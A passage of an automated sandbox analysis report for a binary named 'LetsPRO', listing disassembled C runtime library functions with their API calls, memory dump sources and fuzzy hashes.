                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _fileno
                                        • String ID:
                                        • API String ID: 467780811-0
                                        • Opcode ID: a7f59fa0dbaa72c00ec1e594a6b1cfa30c225ec6a3cb2c2f8618f15bde116d7e
                                        • Instruction ID: 89f609a203c4b7855aa2cc860fcaf0ce6046f611a39670c53132ad1a18af7a6b
                                        • Opcode Fuzzy Hash: a7f59fa0dbaa72c00ec1e594a6b1cfa30c225ec6a3cb2c2f8618f15bde116d7e
                                        • Instruction Fuzzy Hash: C7510372615705CFC7208F29D844BAEB7E4AF22328B258A2DD4B5C7E91D734E645CF81
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C912A9A Relevance: 13.7, APIs: 9, Instructions: 165COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • memcpy_s.MSVCR100(?,?,?,?), ref: 6C912B43
                                        • _errno.MSVCR100 ref: 6C928C79
                                        • _invalid_parameter_noinfo.MSVCR100 ref: 6C928C84
                                        • _memset.LIBCMT(?,00000000,?), ref: 6C928C97
                                        • _fileno.MSVCR100(?,?,?), ref: 6C928CF3
                                        • _read.MSVCR100(00000000,?,?), ref: 6C928CFA
                                        • _memset.LIBCMT(?,00000000,000000FF), ref: 6C928D24
                                        • _errno.MSVCR100 ref: 6C928D2C
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _errno_memset$_fileno_invalid_parameter_noinfo_readmemcpy_s
                                        • String ID:
                                        • API String ID: 4008029522-0
                                        • Opcode ID: 5987f002416abeaa5bc7689c42fa05087acba37f528f16df8cd3b1623ce58768
                                        • Instruction ID: 9a0e8c4cff9fb7ff0e22d9c66ce5a0b1b9b3ea466a0b21c0014594459aacaa1e
                                        • Opcode Fuzzy Hash: 5987f002416abeaa5bc7689c42fa05087acba37f528f16df8cd3b1623ce58768
                                        • Instruction Fuzzy Hash: 99514631A06B0DDFCB14DF79884929E77B8BF52328F20862AE86457EC4D734DA45CB50
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C90ECFC Relevance: 13.6, APIs: 9, Instructions: 132COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • _fileno.MSVCR100(6C9108DE,?,?,?,6C9108DE,00000040,?), ref: 6C90ED07
                                        • _write.MSVCR100(6C9108DE,FFFF9BAB,00000000,00000000,6C9A45D0,?,?,?,6C9108DE,00000040,?), ref: 6C90ED75
                                        • __p__iob.MSVCR100(6C9A45D0,?,?,?,6C9108DE,00000040,?), ref: 6C912739
                                        • __p__iob.MSVCR100(6C9A45D0,?,?,?,6C9108DE,00000040,?), ref: 6C912749
                                        • _errno.MSVCR100(?,?,?,6C9108DE,00000040,?), ref: 6C92891D
                                        • _errno.MSVCR100(?,?,?,6C9108DE,00000040,?), ref: 6C928934
                                        • _isatty.MSVCR100(6C9108DE,6C9A45D0,?,?,?,6C9108DE,00000040,?), ref: 6C92895B
                                        • __lseeki64.LIBCMT(6C9108DE,00000000,00000000,00000002,00000000,6C9A45D0,?,?,?,6C9108DE,00000040,?), ref: 6C928978
                                        • _write.MSVCR100(6C9108DE,00000040,00000001,00000000,6C9A45D0,?,?,?,6C9108DE,00000040,?), ref: 6C928998
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: __p__iob_errno_write$__lseeki64_fileno_isatty
                                        • String ID:
                                        • API String ID: 2198290031-0
                                        • Opcode ID: 7fb15f86da1094cc84401895b31e854b696ef766f7ff19f8545597add20939a6
                                        • Instruction ID: 6d034b8d10cd6fed63b50ba4174a8f11124c8fcff8e5353fbb80ada6c6cb5e0f
                                        • Opcode Fuzzy Hash: 7fb15f86da1094cc84401895b31e854b696ef766f7ff19f8545597add20939a6
                                        • Instruction Fuzzy Hash: E2410676504B059FD7248F29C841A9A7BE4EF62338B24C61EE4F697E90DB38E900CB51
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C93D87E Relevance: 13.6, APIs: 9, Instructions: 75COMMON
                                        Download Yara Rule
                                        APIs
                                        • ??_V@YAXPAX@Z.MSVCR100(?,6C93DA5B,?,?,?,?,?,6C93D023,?,00000000), ref: 6C93D893
                                        • ??_V@YAXPAX@Z.MSVCR100(?,?,6C93DA5B,?,?,?,?,?,6C93D023,?,00000000), ref: 6C93D89B
                                        • ??_V@YAXPAX@Z.MSVCR100(?,?,?,6C93DA5B,?,?,?,?,?,6C93D023,?,00000000), ref: 6C93D8A3
                                        • ??_U@YAPAXI@Z.MSVCR100(00000000,?,?,?,6C93DA5B,?,?,?,?,?,6C93D023,?,00000000), ref: 6C93D8BA
                                        • ??_U@YAPAXI@Z.MSVCR100(00000000), ref: 6C93D8DD
                                        • ??_U@YAPAXI@Z.MSVCR100(00000000,00000000), ref: 6C93D8F7
                                        • _memset.LIBCMT(?,00000000,?,6C93DA5B,?,?,?,?,?,6C93D023,?,00000000), ref: 6C93D90D
                                        • _memset.LIBCMT(?,00000000,?,00000000), ref: 6C93D926
                                        • _memset.LIBCMT(?,00000000,?,?,00000000,?,00000000), ref: 6C93D937
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _memset
                                        • String ID:
                                        • API String ID: 2102423945-0
                                        • Opcode ID: 85aee5d3f42f1a87ef047c3eda421d7cabb3c702151de093e9d7a7882a32195b
                                        • Instruction ID: 312309b61d270f83f4bfaaef5782bff02d1088fa06611dd73c7634ed8a8d20f4
                                        • Opcode Fuzzy Hash: 85aee5d3f42f1a87ef047c3eda421d7cabb3c702151de093e9d7a7882a32195b
                                        • Instruction Fuzzy Hash: 67214FB12117116FEB349B38DD16B67B7E4EF14344F50892DE19BC9AA1EB75F8048B40
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C90ACCD Relevance: 13.6, APIs: 9, Instructions: 67COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • __doserrno.MSVCR100(6C90AD70,00000010,6C90CE19,00000000,?,?,?,?,6C9130F1,?), ref: 6C90AD94
                                        • __doserrno.MSVCR100(6C90AD70,00000010,6C90CE19,00000000,?,?,?,?,6C9130F1,?), ref: 6C92FD8C
                                        • _errno.MSVCR100(6C90AD70,00000010,6C90CE19,00000000,?,?,?,?,6C9130F1,?), ref: 6C92FD94
                                        • _errno.MSVCR100(6C90AD70,00000010,6C90CE19,00000000,?,?,?,?,6C9130F1,?), ref: 6C92FDAA
                                        • _invalid_parameter_noinfo.MSVCR100(6C90AD70,00000010,6C90CE19,00000000,?,?,?,?,6C9130F1,?), ref: 6C92FDB5
                                        • __doserrno.MSVCR100(6C90AD70,00000010,6C90CE19,00000000,?,?,?,?,6C9130F1,?), ref: 6C92FDBC
                                        • _errno.MSVCR100(6C90AD70,00000010,6C90CE19,00000000,?,?,?,?,6C9130F1,?), ref: 6C92FDC4
                                        • _errno.MSVCR100(6C90AD70,00000010,6C90CE19,00000000,?,?,?,?,6C9130F1,?), ref: 6C92FDD1
                                        • __doserrno.MSVCR100(6C90AD70,00000010,6C90CE19,00000000,?,?,?,?,6C9130F1,?), ref: 6C92FDDC
                                          • Part of subcall function 6C90A51F: EnterCriticalSection.KERNEL32(00000108,6C90A580,0000000C,6C90ECA7,?,6C90ECE0,00000010,6C928A4E,?,00000000,00000002,?,6C9A45D0,?,?), ref: 6C90A570
                                          • Part of subcall function 6C90ABB7: ReadFile.KERNEL32(?,00000040,?,?,00000000,?,?,?), ref: 6C90AC7D
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: __doserrno_errno$CriticalEnterFileReadSection_invalid_parameter_noinfo
                                        • String ID:
                                        • API String ID: 590220429-0
                                        • Opcode ID: 98f1ee1cfc2bbfc09064ff2716052f0419d1b42007a1e4399155484676464d2f
                                        • Instruction ID: 484800faf9b46a39611878dc89077e5abbddc907fd9df7581aefe345240e9bdf
                                        • Opcode Fuzzy Hash: 98f1ee1cfc2bbfc09064ff2716052f0419d1b42007a1e4399155484676464d2f
                                        • Instruction Fuzzy Hash: 90217F72A51644DFD7119FA4C88079D37B4AF2232AF210648D4749BAE1CF79C9048BA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C93F9D8 Relevance: 13.6, APIs: 9, Instructions: 65COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • InterlockedFlushSList.KERNEL32(?,?,?,6C93F2EA), ref: 6C93F9E3
                                        • ??3@YAXPAX@Z.MSVCR100(-00000004,?,?,6C93F2EA), ref: 6C93F9EF
                                        • InterlockedFlushSList.KERNEL32(?,?,?,6C93F2EA), ref: 6C93F9FD
                                        • ??3@YAXPAX@Z.MSVCR100(-00000004,?,?,6C93F2EA), ref: 6C93FA09
                                        • ??3@YAXPAX@Z.MSVCR100(?,?,?,6C93F2EA), ref: 6C93FA1E
                                        • ??3@YAXPAX@Z.MSVCR100(00000000,?,?,6C93F2EA), ref: 6C93FA3B
                                        • ??_V@YAXPAX@Z.MSVCR100(?,?,?,6C93F2EA), ref: 6C93FA4C
                                        • ??3@YAXPAX@Z.MSVCR100(?,?,?,?,6C93F2EA), ref: 6C93FA52
                                        • ??_V@YAXPAX@Z.MSVCR100(?,?,?,6C93F2EA), ref: 6C93FA62
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: ??3@$FlushInterlockedList
                                        • String ID:
                                        • API String ID: 681866488-0
                                        • Opcode ID: 6bd8d437a87f53a7a3be0088dd0577fb47f183594620b1543589d30ef21c6ec1
                                        • Instruction ID: d1bc5298fa827c008e5124b9f56c6d8bc2446af3a1fc32168feb94fe5ba2c942
                                        • Opcode Fuzzy Hash: 6bd8d437a87f53a7a3be0088dd0577fb47f183594620b1543589d30ef21c6ec1
                                        • Instruction Fuzzy Hash: E011A0762046529B8311CE69D5C084AB3B9FFEA32C339256ED49983F01FB30F959CA50
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C90A94B Relevance: 13.6, APIs: 9, Instructions: 61COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • _malloc_crt.MSVCR100(00000018,6C90A988,0000000C,6C927537,00000001,00000001,?,6C901F15,0000000D), ref: 6C90A9AF
                                        • _lock.MSVCR100(0000000A,6C90A988,0000000C,6C927537,00000001,00000001,?,6C901F15,0000000D), ref: 6C90A9C1
                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(00000000,00000FA0,6C90A988,0000000C,6C927537,00000001,00000001,?,6C901F15,0000000D), ref: 6C90A9D8
                                        • __FF_MSGBANNER.LIBCMT ref: 6C9274DF
                                        • __NMSG_WRITE.LIBCMT ref: 6C9274E6
                                        • _errno.MSVCR100(6C90A988,0000000C,6C927537,00000001,00000001,?,6C901F15,0000000D), ref: 6C9274F9
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: CountCriticalInitializeSectionSpin_errno_lock_malloc_crt
                                        • String ID:
                                        • API String ID: 957642387-0
                                        • Opcode ID: 284ff8535619eb2edaa7bf742ef78138fa4e486557a85d89f09139859836ec1d
                                        • Instruction ID: baf52fde7aab6700f6d2f239d17e90d3412e27089458b1954fae17341f23e4fd
                                        • Opcode Fuzzy Hash: 284ff8535619eb2edaa7bf742ef78138fa4e486557a85d89f09139859836ec1d
                                        • Instruction Fuzzy Hash: D7110A31744642DEEB006FB5D881BAC77B06FB271CF21445DD1A16BA80CF78C489CB51
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C90240B Relevance: 13.5, APIs: 9, Instructions: 44COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _errno$__doserrno$AttributesErrorFileLast__dosmaperr_invalid_parameter_noinfo
                                        • String ID:
                                        • API String ID: 2636503730-0
                                        • Opcode ID: 543de16471b8c2c94b093de074acdbf3e254033c123be93140c8024047ee276c
                                        • Instruction ID: 9709cac2beba2fd28ad7aa175df735281652f5daf180c3cfab46ac5eb5695a04
                                        • Opcode Fuzzy Hash: 543de16471b8c2c94b093de074acdbf3e254033c123be93140c8024047ee276c
                                        • Instruction Fuzzy Hash: 0B01D170604A54DFD7215FB9C9097CE3B28AF2272CF105258E9349AEA4DF39C4058BD1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C9460E5 Relevance: 13.5, APIs: 9, Instructions: 43COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3.LIBCMT ref: 6C9460EC
                                        • __ExceptionPtrCopy.LIBCMT(?,00000008,00000014,6C94580F,?,?,?), ref: 6C946103
                                          • Part of subcall function 6C94BAEB: __EH_prolog3.LIBCMT ref: 6C94BAF2
                                          • Part of subcall function 6C94BAEB: _Reset.LIBCMT ref: 6C94BB11
                                        • ?__ExceptionPtrDestroy@@YAXPAX@Z.MSVCR100(00000008,?,00000008,00000014,6C94580F,?,?,?), ref: 6C94610D
                                          • Part of subcall function 6C94BA7A: shared_ptr.LIBCMT ref: 6C94BA84
                                        • ??3@YAXPAX@Z.MSVCR100(00000008,00000008,?,00000008,00000014,6C94580F,?,?,?), ref: 6C946113
                                        • __uncaught_exception.MSVCR100 ref: 6C94611F
                                        • __ExceptionPtrCopy.LIBCMT(?,?), ref: 6C946130
                                        • ?__ExceptionPtrRethrow@@YAXPBX@Z.MSVCR100(?,?,?), ref: 6C94613D
                                        • ?__ExceptionPtrDestroy@@YAXPAX@Z.MSVCR100(?,?,?,?), ref: 6C94614A
                                        • ?__ExceptionPtrDestroy@@YAXPAX@Z.MSVCR100(?), ref: 6C94615A
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: Exception$Destroy@@$CopyH_prolog3$??3@ResetRethrow@@__uncaught_exceptionshared_ptr
                                        • String ID:
                                        • API String ID: 1394407404-0
                                        • Opcode ID: 6fc3f9d86c4567664eabd3457247aef95c76b623301000cf692cb2d5f0d7f2b6
                                        • Instruction ID: 013a7088a2504405e6be7db3475ca645386f3e78a59c9b57b8ad05bf42d75d1c
                                        • Opcode Fuzzy Hash: 6fc3f9d86c4567664eabd3457247aef95c76b623301000cf692cb2d5f0d7f2b6
                                        • Instruction Fuzzy Hash: EC017CB2801A18EADF00E7F48805BDEBBBC6F39218F548154D510A3A81D734D70987B1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C90FD8F Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 298COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: __aulldvrm
                                        • String ID: @$g
                                        • API String ID: 1302938615-2917482895
                                        • Opcode ID: 11d1b95197930e505d92971d561ea7b5b995b051d023459917af4af464eacd67
                                        • Instruction ID: 41bcaf99d858ad7472ebfcddfea93f2acf6530ddaa4d9f5867771aa93b8a8ff1
                                        • Opcode Fuzzy Hash: 11d1b95197930e505d92971d561ea7b5b995b051d023459917af4af464eacd67
                                        • Instruction Fuzzy Hash: AAC1B072E4926D8EDB208A14CC887D9B7B8AB5531CF2402DDD418A7A91D774DFC5CF88
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C90D8DE Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 189COMMONLIBRARYCODE
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: generic-type-$template-parameter-
                                        • API String ID: 0-13229604
                                        • Opcode ID: 48a65bd2c9d631bb8269a90a12d5e83b22d3e61abbdf6a176e916fcee3c04589
                                        • Instruction ID: 4ec34462ec694154fbda7e4a982dfc0cefe1b40b0cf40ef6e651dca51b76c146
                                        • Opcode Fuzzy Hash: 48a65bd2c9d631bb8269a90a12d5e83b22d3e61abbdf6a176e916fcee3c04589
                                        • Instruction Fuzzy Hash: 23617F72B096489FDB04CFA8D491AED7BB8EF5A304F20405ED561A7B40D735D909CB94
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C97E46C Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 126COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 6C90072C: GetLastError.KERNEL32(6C8F3238,?,6C90084A,6C998136), ref: 6C900730
                                          • Part of subcall function 6C90072C: __set_flsgetvalue.MSVCR100 ref: 6C90073E
                                          • Part of subcall function 6C90072C: SetLastError.KERNEL32(00000000), ref: 6C900750
                                        • _calloc_crt.MSVCR100(00000086,00000002), ref: 6C97E495
                                        • __get_sys_err_msg.LIBCMT ref: 6C97E4B8
                                          • Part of subcall function 6C97C364: __sys_nerr.MSVCR100(?,?,6C97C41C,00000000), ref: 6C97C371
                                          • Part of subcall function 6C97C364: __sys_nerr.MSVCR100(?,?,6C97C41C,00000000), ref: 6C97C37A
                                          • Part of subcall function 6C97C364: __sys_errlist.MSVCR100(?,?,6C97C41C,00000000), ref: 6C97C381
                                        • __cftoe.LIBCMT(00000000,?,00000086,00000000,00000085), ref: 6C97E4C2
                                          • Part of subcall function 6C95C4E8: _mbstowcs_s_l.MSVCR100(?,?,?,?,?,00000000), ref: 6C95C4FE
                                        • __invoke_watson.LIBCMT(00000000,00000000,00000000,00000000,00000000), ref: 6C97E4D7
                                        • _errno.MSVCR100(?,?,6C97C50B,00000000,?,00000000), ref: 6C97E56D
                                        • _invalid_parameter_noinfo.MSVCR100(?,?,6C97C50B,00000000,?,00000000), ref: 6C97E577
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: ErrorLast__sys_nerr$__cftoe__get_sys_err_msg__invoke_watson__set_flsgetvalue__sys_errlist_calloc_crt_errno_invalid_parameter_noinfo_mbstowcs_s_l
                                        • String ID: Visual C++ CRT: Not enough memory to complete call to strerror.
                                        • API String ID: 3324003163-798102604
                                        • Opcode ID: 6e11a9f0eb7d73ce9b5184017b58946069b8c9c71110d89f7d95dbfd87e8de23
                                        • Instruction ID: bc02643497e259ac53cec4d946934d39e2edbc2ddd3390df36d4562e1d053379
                                        • Opcode Fuzzy Hash: 6e11a9f0eb7d73ce9b5184017b58946069b8c9c71110d89f7d95dbfd87e8de23
                                        • Instruction Fuzzy Hash: 7331AF9264F3D81FCB229A745C69495BF286A2362870DC7DFE8898FD93E714D40083B2
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C9066BA Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 116stringCOMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • _memset.LIBCMT(00000000,00000000,00000090,00000083,00000001,000000BC,?,6C906D85,?,00000001,00000000,00000000,00000005), ref: 6C9066CE
                                        • strncpy_s.MSVCR100(00000080,00000010,00000001,0000000F,00000000,00000000,00000005), ref: 6C912850
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _memsetstrncpy_s
                                        • String ID: _.,
                                        • API String ID: 1794348173-2709443920
                                        • Opcode ID: 3af88e6a918f7ae212e4de25495006fcf1ea70196762d564851c7e2fd686ed4e
                                        • Instruction ID: 21535e6babacff5215b1e3e21da342f8d59e328b0f7dc621073725cb2c2eb8b6
                                        • Opcode Fuzzy Hash: 3af88e6a918f7ae212e4de25495006fcf1ea70196762d564851c7e2fd686ed4e
                                        • Instruction Fuzzy Hash: DA31F1716492A9AEEF2089258C00BEA3B7CAF0236CF187A16F96CD6981E335D584C751
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C95C3E8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _errno$_invalid_parameter_noinfo
                                        • String ID: P
                                        • API String ID: 2819658684-3110715001
                                        • Opcode ID: 6a3a02d3b2b67dd4f2ce6058fc93e99910dda681d2a43c3dbbf5f4b720a12204
                                        • Instruction ID: 725ce01988c2737cf737e1543209d85857beb279fe99d1c7ba076dcf739e71da
                                        • Opcode Fuzzy Hash: 6a3a02d3b2b67dd4f2ce6058fc93e99910dda681d2a43c3dbbf5f4b720a12204
                                        • Instruction Fuzzy Hash: 8331A431A00285DFCB20EF68C8809BE77B8FF18318B61065AE8709BA91D771D961C791
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C902079 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 91COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • _errno.MSVCR100 ref: 6C929383
